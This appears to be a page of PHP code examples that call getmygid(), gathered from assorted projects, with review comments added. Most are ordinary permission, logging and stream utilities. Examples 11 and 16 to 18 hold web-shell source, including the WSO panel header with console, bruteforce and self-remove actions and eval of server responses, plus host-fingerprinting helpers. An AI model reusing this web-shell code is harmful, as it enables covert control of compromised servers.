Ejemplo n.º 1
Archivo: gid.php Proyecto: rhertzog/lcs
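 /**
  * Compares the group ID PHP runs under with PHPSECINFO_MIN_SAFE_GID.
  *
  * getmygid() reports the group that owns the script file, not the group of
  * the running process, so the effective GID from the POSIX extension is
  * used whenever that extension is available.
  *
  * @see PHPSECINFO_MIN_SAFE_GID
  *
  * @return mixed PHPSECINFO_TEST_RESULT_OK when the GID is at or above the
  *               minimum, PHPSECINFO_TEST_RESULT_WARN otherwise
  */
 function _execTest()
 {
     // Without ext/posix (e.g. on Windows) fall back to the script owner's GID.
     $gid = function_exists('posix_getegid') ? posix_getegid() : getmygid();

     return $gid >= PHPSECINFO_MIN_SAFE_GID
         ? PHPSECINFO_TEST_RESULT_OK
         : PHPSECINFO_TEST_RESULT_WARN;
 }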
Ejemplo n.º 2
 /**
  * Sends a short runtime summary (working directory, ids, memory use and
  * versions) to the sender, one "key: value" message per entry.
  *
  * NOTE(review): these values describe the host process; confirm at the call
  * site that only trusted senders can trigger this report.
  *
  * @param CommandSender $sender
  */
 public function sendPHPInfo(CommandSender $sender)
 {
     $report = [];
     $report["CWD"] = getcwd();
     // getmygid()/getmyuid() are the ids of the script file's owner.
     $report["GID"] = getmygid();
     $report["PID"] = getmypid();
     $report["UID"] = getmyuid();
     $report["Memory-usage"] = memory_get_usage(true);
     $report["Memory-peak-usage"] = memory_get_peak_usage(true);
     $report["PHP-version"] = phpversion();
     $report["Zend-version"] = zend_version();

     foreach ($report as $label => $detail) {
         $sender->sendMessage($label . ": " . $detail);
     }
 }
Ejemplo n.º 3
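 /**
  * Mounts a tmpfs RAM disk at $this->ram_disk_path, gives it to the owner of
  * the running script and sets its mode to 0755.
  *
  * The mount point and the size option are shell-quoted, so a path that
  * contains spaces or shell metacharacters cannot change the commands that
  * are run (two of them through sudo).
  * NOTE(review): assumes runCommand() hands the string to a shell — confirm.
  */
 public function mount()
 {
     $target = escapeshellarg($this->ram_disk_path);
     $sizeOption = escapeshellarg("size={$this->getSizeMb()}m");

     $this->runCommand("sudo mount -t tmpfs -o {$sizeOption} tmpfs {$target}");

     // getmyuid()/getmygid() return the ids of the script file's owner.
     $uid = getmyuid();
     $gid = getmygid();
     $this->runCommand("sudo chown {$uid}:{$gid} {$target}");
     $this->runCommand("chmod 0755 {$target}");
 }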
Ejemplo n.º 4
/**
 * sd_pid_notify_with_fds PHP implementation
 *
 * Sends a state string as one datagram to the Unix socket named by the
 * NOTIFY_SOCKET environment variable, optionally attaching file descriptors
 * (SCM_RIGHTS) and a credentials record (SCM_CREDENTIALS).
 *
 * @param int    $pid FIXME currently not usable!
 * @param bool   $unset_environment when true, NOTIFY_SOCKET is removed from the environment on the paths that reach the finish label
 * @param string $state             message to send; it is trimmed and a newline is appended
 * @param array  $fds               used as the data of an SCM_RIGHTS control message when not empty
 *
 * @return int 1 when a message was sent, 0 when NOTIFY_SOCKET is not set, a negative value on error
 *
 * @link https://github.com/systemd/systemd/blob/master/src/libsystemd/sd-daemon/sd-daemon.c
 */
function sd_pid_notify_with_fds($pid, $unset_environment, $state, array $fds)
{
    $state = trim($state);
    if ('' === $state) {
        // NOTE(review): EINVAL is not defined in this block — presumably a project constant; verify.
        $r = -EINVAL;
        goto finish;
    }
    $e = getenv('NOTIFY_SOCKET');
    if (!$e) {
        // Nothing to notify. This return bypasses the finish label, so
        // $unset_environment is not honoured on this path.
        return 0;
    }
    /* Must be an abstract socket, or an absolute path */
    if (strlen($e) < 2 || strpos($e, '@') !== 0 && strpos($e, '/') !== 0) {
        $r = -EINVAL;
        goto finish;
    }
    $fd = socket_create(AF_UNIX, SOCK_DGRAM, 0);
    if (!$fd) {
        $r = -1 * socket_last_error();
        goto finish;
    }
    $msghdr = ['name' => ['path' => $e], 'iov' => [$state . "\n"], 'control' => []];
    if (strpos($msghdr['name']['path'], '@') === 0) {
        // NOTE(review): this adds an element with key 0 to the 'name' array and leaves
        // 'path' starting with '@'. The linked C code replaces the first byte of the
        // path with NUL for abstract sockets — confirm abstract sockets work here.
        $msghdr['name'][0] = "";
    }
    $pid = (int) $pid;
    // A credentials record is only attached for a non-zero PID other than our own.
    $have_pid = $pid && getmypid() !== $pid;
    if (count($fds) > 0 || $have_pid) {
        if (count($fds)) {
            $msghdr['control'][] = ['level' => SOL_SOCKET, 'type' => SCM_RIGHTS, 'data' => $fds];
        }
        if ($have_pid) {
            // getmyuid()/getmygid() are the ids of the script file's owner, which can
            // differ from the ids of the running process.
            $msghdr['control'][] = ['level' => SOL_SOCKET, 'type' => SCM_CREDENTIALS, 'data' => ['pid' => $pid, 'uid' => getmyuid(), 'gid' => getmygid()]];
        }
    }
    /* First try with fake ucred data, as requested */
    if (@socket_sendmsg($fd, $msghdr, MSG_NOSIGNAL) !== false) {
        $r = 1;
        goto finish;
    }
    /* If that failed, try with our own ucred instead */
    if ($have_pid) {
        // The retry drops every control message, so any SCM_RIGHTS entry for $fds is dropped too.
        $msghdr['control'] = [];
        if (@socket_sendmsg($fd, $msghdr, MSG_NOSIGNAL) !== false) {
            $r = 1;
            goto finish;
        }
    }
    $r = -1 * socket_last_error($fd);
    finish:
    // Shared exit: close the socket if one was created, then optionally clear the variable.
    if (isset($fd) && $fd) {
        socket_close($fd);
    }
    if ($unset_environment) {
        putenv('NOTIFY_SOCKET');
    }
    return $r;
}
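/**
 * Builds $length bytes by hashing and XOR-mixing many process, host and OS values.
 *
 * SECURITY: this is a home-grown generator. Its "weak" inputs (paths, versions,
 * ids, timers, mt_rand()/rand()) are largely predictable, so the quality of the
 * output rests on the OS/extension sources mixed in when $secure is true. For
 * keys, tokens, salts and nonces prefer random_bytes()/random_int() on PHP 7+.
 *
 * Fixes over the previous version:
 *  - an unavailable strong source now contributes 64 zero bytes instead of an
 *    empty string; string XOR is cut to the shorter operand, so one empty
 *    source emptied the whole pool and the loop never finished;
 *  - the extractor accumulator starts as an int (string|int is a TypeError on PHP 8);
 *  - a length of 0 returns an empty result instead of looping forever;
 *  - the /dev/urandom handle is closed, gmp_random() is only called when it exists,
 *    and random_bytes() is mixed in when the runtime provides it.
 *
 * @param int          $length       number of bytes wanted (the absolute value is used)
 * @param bool         $secure       true to mix in the strong sources and run the Von Neumann extractor
 * @param bool         $raw          true returns binary, false returns hex (2 * $length characters)
 * @param string|array $startEntropy extra caller-supplied seed material
 * @param int          $rounds       (out) number of loop iterations that were needed
 * @param int          $drop         (out) bit counter maintained by the extractor
 *
 * @return string
 */
function randomBytes($length = 16, $secure = true, $raw = true, $startEntropy = "", &$rounds = 0, &$drop = 0)
{
    static $lastRandom = "";
    $output = "";
    $length = abs((int) $length);
    $secureValue = 0;
    $rounds = 0;
    $drop = 0;
    while (strlen($output) < $length) {
        //some entropy, but works ^^
        $weakEntropy = array(
            is_array($startEntropy) ? implode($startEntropy) : $startEntropy,
            serialize(stat(__FILE__)),
            __DIR__,
            PHP_OS,
            microtime(),
            (string) lcg_value(),
            (string) PHP_MAXPATHLEN,
            PHP_SAPI,
            (string) PHP_INT_MAX . "." . PHP_INT_SIZE,
            serialize($_SERVER),
            serialize(get_defined_constants()),
            get_current_user(),
            serialize(ini_get_all()),
            (string) memory_get_usage() . "." . memory_get_peak_usage(),
            php_uname(),
            phpversion(),
            // gmp_random() no longer exists on current PHP even when ext/gmp is loaded.
            (extension_loaded("gmp") && function_exists("gmp_random")) ? gmp_strval(gmp_random(4)) : microtime(),
            zend_version(),
            (string) getmypid(),
            (string) getmyuid(),
            (string) mt_rand(),
            (string) getmyinode(),
            (string) getmygid(),
            (string) rand(),
            function_exists("zend_thread_id") ? (string) zend_thread_id() : microtime(),
            var_export(@get_browser(), true),
            function_exists("getrusage") ? @implode(getrusage()) : microtime(),
            function_exists("sys_getloadavg") ? @implode(sys_getloadavg()) : microtime(),
            serialize(get_loaded_extensions()),
            sys_get_temp_dir(),
            (string) disk_free_space("."),
            (string) disk_total_space("."),
            uniqid(microtime(), true),
            file_exists("/proc/cpuinfo") ? file_get_contents("/proc/cpuinfo") : microtime(),
        );
        shuffle($weakEntropy);
        $value = hash("sha512", implode($weakEntropy), true);
        $lastRandom .= $value;
        foreach ($weakEntropy as $k => $c) {
            //mixing entropy values with XOR and hash randomness extractor
            $value ^= hash("sha256", $c . microtime() . $k, true) . hash("sha256", mt_rand() . microtime() . $k . $c, true);
            $value ^= hash("sha512", (string) lcg_value() . $c . microtime() . $k, true);
        }
        unset($weakEntropy);
        if ($secure === true) {
            // Placeholder for a source that is missing: 64 zero bytes leave the XOR unchanged.
            $filler = str_repeat("\x00", 64);

            $seed = $startEntropy;
            if (is_array($startEntropy)) {
                $seed = count($startEntropy) > 0 ? $startEntropy[($rounds + $drop) % count($startEntropy)] : "";
            }

            $urandom = $filler;
            if (is_readable("/dev/urandom") && ($handle = @fopen("/dev/urandom", "rb")) !== false) {
                $chunk = fread($handle, 64);
                fclose($handle);
                if (is_string($chunk) && strlen($chunk) === 64) {
                    $urandom = $chunk;
                }
            }

            $openssl = $filler;
            if (function_exists("openssl_random_pseudo_bytes") and version_compare(PHP_VERSION, "5.3.4", ">=")) {
                $chunk = openssl_random_pseudo_bytes(64);
                if (is_string($chunk) && strlen($chunk) === 64) {
                    $openssl = $chunk;
                }
            }

            $mcrypt = $filler;
            if (function_exists("mcrypt_create_iv")) {
                $chunk = mcrypt_create_iv(64, MCRYPT_DEV_URANDOM);
                if (is_string($chunk) && strlen($chunk) === 64) {
                    $mcrypt = $chunk;
                }
            }

            $csprng = $filler;
            if (function_exists("random_bytes")) {
                try {
                    $csprng = random_bytes(64);
                } catch (Exception $e) {
                    // Best effort: keep the zero filler and rely on the other sources.
                    $csprng = $filler;
                }
            }

            $strongEntropy = $value;
            foreach (array(hash("sha512", $seed, true), $urandom, $openssl, $mcrypt, $csprng) as $source) {
                $strongEntropy = $strongEntropy ^ $source;
            }
            $value = "";
            //Von Neumann randomness extractor: each bit pair yields one bit when the
            //two bits differ and nothing when they are equal
            $bitcnt = 0;
            for ($j = 0; $j < 64; ++$j) {
                $a = ord($strongEntropy[$j]);
                for ($i = 0; $i < 8; $i += 2) {
                    $b = ($a & (1 << $i)) > 0 ? 1 : 0;
                    if ($b != (($a & (1 << ($i + 1))) > 0 ? 1 : 0)) {
                        $secureValue |= $b << $bitcnt;
                        if ($bitcnt == 7) {
                            $value .= chr($secureValue);
                            $secureValue = 0;
                            $bitcnt = 0;
                        } else {
                            ++$bitcnt;
                        }
                        ++$drop;
                    } else {
                        $drop += 2;
                    }
                }
            }
        }
        $output .= substr($value, 0, min($length - strlen($output), $length));
        unset($value);
        ++$rounds;
    }
    $lastRandom = hash("sha512", $lastRandom, true);
    return $raw === false ? bin2hex($output) : $output;
}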
Ejemplo n.º 6
 /**
  * Fabricates a stat() result for a "fiemulate://" URL.
  *
  * The character right after the scheme selects whose file this pretends to
  * be: 'u' (owner matches the script owner), 'g' (group matches), 'o'
  * (neither matches) or 'a' (both match). For 'u', 'g' and 'o' the rest of
  * the path, "not_readable" or "not_writable", clears the matching
  * permission bits from the base mode 0666.
  *
  * @param string $path
  *
  * @return array the 13 stat fields, first by position and then by name
  */
 public function url_stat($path)
 {
     $prefixLength = strlen('fiemulate://');
     $class = substr($path, $prefixLength, 1);
     $restriction = substr($path, $prefixLength + 2);

     // class => [uid offset, gid offset, bits cleared for not_readable, bits cleared for not_writable]
     $classes = array(
         'u' => array(0, 1, 0400, 0200),
         'g' => array(1, 0, 0440, 0220),
         'o' => array(1, 1, 0444, 0222),
         'a' => array(0, 0, 0, 0),
     );

     $mode = 0666;
     $uid = 0;
     $gid = 0;
     if (is_string($class) && isset($classes[$class])) {
         $rule = $classes[$class];
         $uid = getmyuid() + $rule[0];
         $gid = getmygid() + $rule[1];
         if ($restriction === 'not_readable') {
             $mode &= ~$rule[2];
         } elseif ($restriction === 'not_writable') {
             $mode &= ~$rule[3];
         }
     }

     $names = array('dev', 'ino', 'mode', 'nlink', 'uid', 'gid', 'rdev', 'size', 'atime', 'mtime', 'ctime', 'blksize', 'blocks');
     $positional = array(0, 0, $mode, 0, $uid, $gid, 0, 0, 0, 0, 0, 0, 0);

     // Positional entries come first, the named copies follow.
     return $positional + array_combine($names, $positional);
 }
Ejemplo n.º 7
 /**
  * Picks the permission class that applies to a file: 'u' when its owner is
  * the script owner, otherwise 'g' when its group is the script's group,
  * otherwise 'o'.
  *
  * getmyuid()/getmygid() are the ids of the script file's owner, which may
  * differ from the ids of the running process.
  *
  * @param string $file
  *
  * @return string 'u', 'g' or 'o'
  */
 public static function matchingLetter($file)
 {
     $letter = 'o';
     if (fileowner($file) === getmyuid()) {
         $letter = 'u';
     } elseif (filegroup($file) === getmygid()) {
         $letter = 'g';
     }

     return $letter;
 }
Ejemplo n.º 8
 /**
  * Reads or writes a one-character flag kept in a state file under /tmp.
  *
  * The file is created with "0" when it does not exist yet.
  *
  * NOTE(review): the file name is predictable (only getmygid() varies) and
  * /tmp is normally shared, so other local accounts may be able to read,
  * pre-create or symlink this path.
  *
  * @param bool|null $value null to read; true stores "1", any other value stores "0"
  *
  * @return bool|null the stored flag when reading; nothing is returned when writing
  */
 public static function state($value = null)
 {
     $path = sprintf("/tmp/sonata_behat_test_%s.state", getmygid());
     if (!is_file($path)) {
         file_put_contents($path, "0");
     }

     if ($value !== null) {
         $flag = $value === true ? "1" : "0";
         file_put_contents($path, $flag);

         return;
     }

     return file_get_contents($path) !== "0";
 }
Ejemplo n.º 9
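 /**
  * CLI-only maintenance action: pulls the repository, resets ownership of the
  * directory above FCPATH to the script owner and opens up the cache and logs
  * directories.
  *
  * Paths are shell-quoted so that an install location containing spaces or
  * shell metacharacters cannot change the commands that are executed.
  */
 public function pull_project()
 {
     if (!is_cli()) {
         echo 'This controller must run from command line interface only.' . PHP_EOL;
         return;
     }
     exec('git pull');
     // getmyuid()/getmygid() are the ids of the script file's owner.
     exec('chown ' . getmyuid() . ':' . getmygid() . ' ' . escapeshellarg(FCPATH . '..') . ' -R');
     // NOTE(review): 0777 lets every local account write to cache and logs; a mode
     // limited to the web server's user/group would be the safer target.
     exec('chmod 0777 ' . escapeshellarg(APPPATH . 'cache'));
     exec('chmod 0777 ' . escapeshellarg(APPPATH . 'logs'));
 }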
Ejemplo n.º 10
 /**
  * Check if path is writable.
  *
  * On top of is_writable(), when the safe_mode ini setting is on the path's
  * group (with safe_mode_gid) or owner (without it) must equal the script
  * owner's gid or uid.
  *
  * @param string $path
  * @return bool
  */
 public static function isWritable($path)
 {
     $writable = is_writable($path);

     if ($writable && ini_get('safe_mode')) {
         $idsDiffer = ini_get('safe_mode_gid')
             ? getmygid() != filegroup($path)
             : getmyuid() != fileowner($path);
         $writable = !$idsDiffer;
     }

     return $writable;
 }
Ejemplo n.º 11
 /**
  * Fills $this->config with host and process details, then restores the
  * interpreter name and working directory kept in the session.
  *
  * NOTE(review): the defaults visible here ('interpreter' => 'shell_exec', a
  * tracked working directory, a prompt) look like a browser-driven command
  * console. A file with this constructor found under a web root should be
  * treated as a probable web shell and its origin investigated.
  */
 public function __construct()
 {
     // Snapshot of the environment: script name, host, address/port, script owner ids,
     // process id, script inode, last modification time and working directory.
     $this->config = array('filename' => basename(__FILE__), 'username' => '', 'password' => '', 'interpreter' => 'shell_exec', 'current_user' => get_current_user(), 'hostname' => function_exists('gethostname') ? gethostname() : $_SERVER['HTTP_HOST'], 'server_address' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : '127.0.0.1', 'server_port' => $_SERVER['SERVER_PORT'], 'request_time' => $_SERVER['REQUEST_TIME'], 'php_owner_uid' => getmyuid(), 'php_owner_gid' => getmygid(), 'php_process_id' => getmypid(), 'inode_script' => getmyinode(), 'last_page_modification' => getlastmod(), 'cwd' => getcwd());
     // The interpreter name is taken from the session without any check in this block.
     if (isset($_SESSION['interpreter'])) {
         $this->config['interpreter'] = $_SESSION['interpreter'];
     }
     // Re-enter the directory remembered in the session and record where that actually led.
     if (isset($_SESSION['cwd']) && $_SESSION['cwd'] != $this->config['cwd']) {
         chdir($_SESSION['cwd']);
         $this->config['cwd'] = getcwd();
     }
     $this->config['prompt'] = $this->get_prompt();
 }
Ejemplo n.º 12
 /**
  * Creates the environment fields for the OS, the script's uid/gid, the script
  * username and the memory in use.
  *
  * NOTE(review): the "Script username" field is described as coming from HTTP
  * authentication, but its value is get_current_user(), i.e. the owner of the
  * running script.
  */
 protected function _init()
 {
     $definitions = array(
         'os' => array('title' => 'OS', 'info' => 'Host operating system', 'value' => PHP_OS),
         'uid' => array('title' => 'Script uid', 'info' => 'script user id', 'value' => getmyuid()),
         'gid' => array('title' => 'Script gid', 'info' => 'script group id', 'value' => getmygid()),
         'script_username' => array('title' => 'Script username', 'info' => 'username obtained via HTTP authentication', 'value' => get_current_user()),
         'memory' => array('title' => 'Memory', 'info' => 'Memory used by this script on host'),
     );
     foreach ($definitions as $property => $definition) {
         $this->{$property} = new Zend_Environment_Field($definition);
     }

     // The memory field gets either a value or a notice explaining why it has none.
     if (!function_exists('memory_get_usage')) {
         $this->memory->notice = 'memory_get_usage() not enabled';
     } else {
         $this->memory->value = memory_get_usage();
     }
 }
Ejemplo n.º 13
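/**
 * Appends one line to the watchdog debug log, deleting the log first once it
 * has grown past 100000 bytes.
 *
 * Line format: "Y-m-d H:i:s [pid]:  function:: text".
 * NOTE(review): $text and $function are written as given; a caller passing
 * untrusted text with line breaks can forge log lines.
 *
 * @param string|null $text     message to log
 * @param string|null $function name of the calling function, used as a prefix
 *
 * @return void
 */
function Myevents($text=null,$function=null){
	// The prefix is the process id; the previous code called getmygid(), which is
	// the group id of the script file's owner.
	$pid=getmypid();
	$logFile="/var/log/artica-postfix/watchdog.debug";
	$logDir=dirname($logFile);
	if(!is_dir($logDir)){@mkdir($logDir);}

	if (is_file($logFile) && filesize($logFile)>100000) {
		unlink($logFile);
	}
	$date=date('Y-m-d H:i:s'). " [$pid]: ";
	$f = @fopen($logFile, 'a');
	// Logging is best effort: without a handle there is nothing to write or close
	// (passing false to fwrite()/fclose() is a TypeError on PHP 8 even with "@").
	if($f===false){return;}
	fwrite($f, "$date $function:: $text\n");
	fclose($f);
}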
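 /**
  * Builds the stat() array for this stream.
  *
  * Size is the length of the stream content (0 when there is none), all three
  * timestamps are the current time, uid/gid are the script owner's ids, and
  * the mode is obtained by adding 100000 to the stream mode and reading the
  * decimal digits as an octal number.
  *
  * The previous version returned an undefined variable ($return), so callers
  * always received null; the assembled array is returned now.
  *
  * @return array the 13 stat fields, first by name and then by position
  */
 public function stat()
 {
     $time = time();
     if ($this->_getStreamContent() != null) {
         $size = strlen($this->_getStreamContent());
     } else {
         $size = 0;
     }
     $uid = getmyuid();
     $gid = getmygid();
     $mode = octdec(100000 + $this->_getStreamMode());
     $keys = array('dev' => 0, 'ino' => 0, 'mode' => $mode, 'nlink' => 0, 'uid' => $uid, 'gid' => $gid, 'rdev' => 0, 'size' => $size, 'atime' => $time, 'mtime' => $time, 'ctime' => $time, 'blksize' => 0, 'blocks' => 0);

     // Named entries plus the same values under their positional indexes 0..12.
     return $keys + array_values($keys);
 }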
Ejemplo n.º 15
 /**
  * Collects request, server and host details into the object's properties.
  *
  * NOTE(review): everything gathered here (paths, server software, kernel
  * release, ids, phpinfo summary) is reconnaissance-grade detail; if it is
  * ever rendered, that page should be restricted to administrators.
  * The first literal of the username string appears redacted in this listing.
  */
 public function __construct()
 {
     $requestFields = array(
         'scriptFilename' => 'SCRIPT_FILENAME',
         'documentRoot' => 'DOCUMENT_ROOT',
         'httpHost' => 'HTTP_HOST',
         'adminEmail' => 'SERVER_ADMIN',
     );
     foreach ($requestFields as $property => $serverKey) {
         $this->{$property} = $this->getServerVar($serverKey);
     }

     $this->time = date('Y.m.d H:i:s', $this->getServerVar('REQUEST_TIME'));

     $serverFields = array(
         'serverAddr' => 'SERVER_ADDR',
         'serverSoftware' => 'SERVER_SOFTWARE',
         'serverGateway' => 'GATEWAY_INTERFACE',
         'serverSignature' => 'SERVER_SIGNATURE',
     );
     foreach ($serverFields as $property => $serverKey) {
         $this->{$property} = $this->getServerVar($serverKey);
     }

     // Host name, "system release version" and machine type from uname.
     $this->serverHostname = @php_uname('n');
     $this->serverPlatform = implode(' ', array(@php_uname('s'), @php_uname('r'), @php_uname('v')));
     $this->serverArchitecture = @php_uname('m');

     // Ids of the script file's owner.
     $ownerUid = @getmyuid();
     $ownerGid = @getmygid();
     $this->username = '******' . $ownerUid . ', gid: ' . $ownerGid;

     $this->pathinfo = getcwd();
     $this->phpinfo = $this->getCompactPhpInfo();
 }
Ejemplo n.º 16
/**
 * Prints the HTML head, the hidden control form and the status and menu tables
 * of the panel.
 *
 * Review notes for defenders, all visible in this function:
 *  - the title reads "<host> - WSO <VERSION>" and the menu offers Console, Sql,
 *    Php, Bruteforce, Network and "Self remove" actions: this is the header of
 *    a web shell, not of an application page;
 *  - every action is a POST of the hidden form "mf" (fields a, c, p1, p2, p3,
 *    charset) back to the same URL, a request shape worth matching in WAF and
 *    request-body logging rules;
 *  - the AJAX path hands part of the server response to eval() in the browser;
 *  - $_POST['charset'], $_POST['a'], HTTP_HOST and REQUEST_URI are written into
 *    the page without escaping.
 */
function printHeader() {
	if(empty($_POST['charset']))
		$_POST['charset'] = "UTF-8";
	global $color;
	?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
<style>
	body		{ background-color:#444;font: 9pt Lucida,Verdana;color:#e1e1e1;margin: 0; }
	td,th		{ font: 9pt Lucida,Verdana;vertical-align:top; }
	table.info	{ color:#fff;background-color:#222; }
	span		{ color:<?=$color?>;font-weight: bolder; }
	h1			{ color:<?=$color?>;border-left:5px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
	div.content	{ padding: 5px;margin-left:5px;background-color:#333; }
	a			{ text-decoration:none; color:<?=$color?>; }
	a:hover		{ text-decoration:underline; }
	.ml1		{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
	.bigarea	{ width:100%;height:250px; }
	input, textarea, select	{ margin:0;color:#fff;background-color:#555;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
	form		{ margin:0px; }
	#toolsTbl	{ text-align:center; }
	.toolsInp	{ width: 300px }
	.main th{text-align:left;background-color:#5e5e5e;}
	.main tr:hover{background-color:#5e5e5e}
	.main td, th{vertical-align:middle}
	.l1	{background-color:#444}
	pre{font-family:Courier,Monospace;}
</style>
<script>
	function set(a,c,p1,p2,p3,charset) {
		if(a != null)document.mf.a.value=a;
		if(c != null)document.mf.c.value=c;
		if(p1 != null)document.mf.p1.value=p1;
		if(p2 != null)document.mf.p2.value=p2;
		if(p3 != null)document.mf.p3.value=p3;
		if(charset != null)document.mf.charset.value=charset;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		document.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = "ajax=true";
		for(i=0;i<document.mf.elements.length;i++)
			params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
		sr('<?=$_SERVER['REQUEST_URI'];?>', params);
	}
	function sr(url, params) {	
		if (window.XMLHttpRequest) {
			req = new XMLHttpRequest();
			req.onreadystatechange = processReqChange;
			req.open("POST", url, true);
			req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
			req.send(params);
		} 
		else if (window.ActiveXObject) {
			req = new ActiveXObject("Microsoft.XMLHTTP");
			if (req) {
				req.onreadystatechange = processReqChange;
				req.open("POST", url, true);
				req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
				req.send(params);
			}
		}
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				//alert(req.responseText);
				var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} 
			else alert("Request error!");
	}
</script>
<head><body>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
	// Host facts for the banner: disk space of the current directory, kernel name and release.
	$freeSpace = @diskfreespace($GLOBALS['cwd']);
	$totalSpace = @disk_total_space($GLOBALS['cwd']);
	// Never leave the total at 0/false: it is used as a divisor for the free-space percentage.
	$totalSpace = $totalSpace?$totalSpace:1;
	$release = @php_uname('r');
	$kernel = @php_uname('s');
	// Search link for the kernel name and release on an external site, shown in the banner.
	$millink='http://milw0rm.com/search.php?dong=';
	if( strpos('Linux', $kernel) !== false )
		$millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
	else
		$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
	// Identity shown in the banner: effective uid/gid and their names via ext/posix when
	// present, otherwise the script owner's ids with an unknown group name.
	if(!function_exists('posix_getegid')) {
		$user = @get_current_user();
		$uid = @getmyuid();
		$gid = @getmygid();
		$group = "?";
	} else {
		$uid = @posix_getpwuid(@posix_geteuid());
		$gid = @posix_getgrgid(@posix_getegid());
		$user = $uid['name'];
		$uid = $uid['uid'];
		$group = $gid['name'];
		$gid = $gid['gid'];
	}
	// One link per component of the current directory, each posting the "FilesMan" action.
	$cwd_links = '';
	$path = explode("/", $GLOBALS['cwd']);
	$n=count($path);
	for($i=0;$i<$n-1;$i++) {
		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
		for($j=0;$j<=$i;$j++)
			$cwd_links .= $path[$j].'/';
		$cwd_links .= "\")'>".$path[$i]."/</a>";
	}
	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
	$opt_charsets = '';
	foreach($charsets as $item)
		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
	// Menu label => action name posted in field "a"; these names are stable strings to search for.
	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network', 'Logout'=>'Logout', 'Self remove' => 'SelfRemove');
	$menu = '';
	foreach($m as $k => $v)
		$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
	$drives = "";
	if ($GLOBALS['os'] == 'win') {
		foreach( range('a','z') as $drive )
		if (is_dir($drive.':\\'))
			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
	}
	// Banner table (uname, user/group, PHP version, disk, cwd, IPs) followed by the menu row.
	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
		 '<td><nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
		 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
		 '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}
Ejemplo n.º 17
/**
 * Returns a string describing the account the script runs as.
 *
 * Unless get_current_user() reports "SYSTEM", the result of ex('id') is used;
 * when that is empty, a "uid=...(...) gid=..." line is assembled from PHP's
 * own functions (which report the script file's owner).
 *
 * NOTE(review): ex() is defined outside this block — presumably it runs a
 * system command. Identity fingerprinting combined with such a helper is
 * typical of web-shell code; verify where this file came from.
 */
function getuser()
{
    $out = get_current_user();
    if ($out != "SYSTEM") {
        // Prefer the output of ex('id'); fall back to PHP's view when it returns nothing.
        if (($out = ex('id')) == '') {
            $out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid();
        }
    }
    return $out;
}
Ejemplo n.º 18
        $lin2 = ex('sysctl -n kernel.osrelease');
    }
    if (!empty($bsd1) && !empty($bsd2)) {
        $sysctl = "{$bsd1} {$bsd2}";
    } else {
        if (!empty($lin1) && !empty($lin2)) {
